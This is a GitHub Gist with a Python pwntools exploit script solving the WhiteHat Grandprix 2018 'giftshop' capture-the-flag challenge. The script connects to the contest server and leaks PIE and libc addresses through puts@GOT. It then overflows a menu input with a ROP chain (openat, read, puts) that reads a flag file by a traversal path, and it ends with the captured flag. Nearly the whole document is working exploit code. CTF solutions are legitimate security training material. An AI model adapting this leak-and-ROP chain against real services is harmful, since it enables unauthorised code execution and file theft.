Last active
August 21, 2018 12:44
-
-
Save sampritipanda/a7950a889e0325f413ca4fa91fe791dd to your computer and use it in GitHub Desktop.
WhiteHat Grandprix 2018 - ForPlayer Solution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #r = process("/home/gift/run.sh") | |
| r = remote("pwn01.grandprix.whitehatvn.com", 26129) | |
| bin = ELF('./giftshop') | |
| poprdi = 0x000000000000225f # pop rdi ; ret | |
| poprsi = 0x0000000000002261 # pop rsi ; ret | |
| poprdx = 0x0000000000002265 # pop rdx ; ret | |
| putsplt = bin.plt['puts'] | |
| putsgot = bin.got['puts'] | |
| exitplt = bin.plt['exit'] | |
| main = 0xda0 | |
| pers = 0x0000000024EE | |
| bss = 0x203206 | |
| stdin = 0x00203110 | |
| #context.log_level = 'debug' | |
| r.recvuntil("here !") | |
| r.recvline() | |
| leak = int(r.recvline().strip(), 16) | |
| print hex(leak) | |
| piebase = leak - 0x2030d8 | |
| print "piebase: " + hex(piebase) | |
| r.recvuntil("??") | |
| r.sendline("q\x00/home/gift/../gift/flag.txt") | |
| r.recvuntil("zz:") | |
| r.sendline("q\x00/home/gift/../gift/flag.txt") | |
| r.recvuntil("choice:") | |
| print hex(poprdi+piebase) | |
| print hex(putsgot+piebase) | |
| print hex(putsplt+piebase) | |
| r.sendline("1\x00" + "AAAABBBBCCCCDDDDEEEEFF" + p64(poprdi + piebase) + p64(putsgot + piebase) + p64(putsplt + piebase) + p64(main + piebase)) | |
| r.recvline() | |
| libc = r.recvline()[:-1] | |
| print "libc leak:" + libc[::-1].encode('hex') | |
| libc = int(libc[::-1].encode("hex"), 16) - 0x6f690 | |
| print "libc: " + hex(libc) | |
| r.recvuntil("here !") | |
| r.recvline() | |
| leak = int(r.recvline().strip(), 16) | |
| print hex(leak) | |
| piebase = leak - 0x2030d8 | |
| print "piebase: " + hex(piebase) | |
| r.recvuntil("??") | |
| r.sendline("q\x00/home/gift/../gift/flag.txt") | |
| r.recvuntil("zz:") | |
| r.sendline("q\x00/home/gift/../gift/flag.txt\x00") | |
| r.recvuntil("choice:") | |
| openoff = 0xf7030 | |
| openatoff = 0xf70f0 | |
| readoff = 0xf7250 | |
| #string loc = 0x203122 | |
| print hex(libc + openoff) | |
| print hex(libc + readoff) | |
| ropchain = [poprdi + piebase, 0x1234, poprsi + piebase, 0x203122 + piebase, poprdx + piebase, 0, openatoff + libc] | |
| ropchain += [poprdi + piebase, 4, poprsi + piebase, bss + piebase, poprdx + piebase, 200, readoff + libc] | |
| ropchain += [poprdi + piebase, bss + piebase, putsplt + piebase, exitplt + piebase] | |
| payload = "" | |
| for i in ropchain: | |
| payload += p64(i) | |
| print repr(payload) | |
| r.sendline("1\x00" + "AAAABBBBCCCCDDDDEEEEFF" + payload) | |
| r.interactive() | |
| # WhiteHat{aeb7656b7a397a01c0d9d19fba3a81352e9b21aa} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment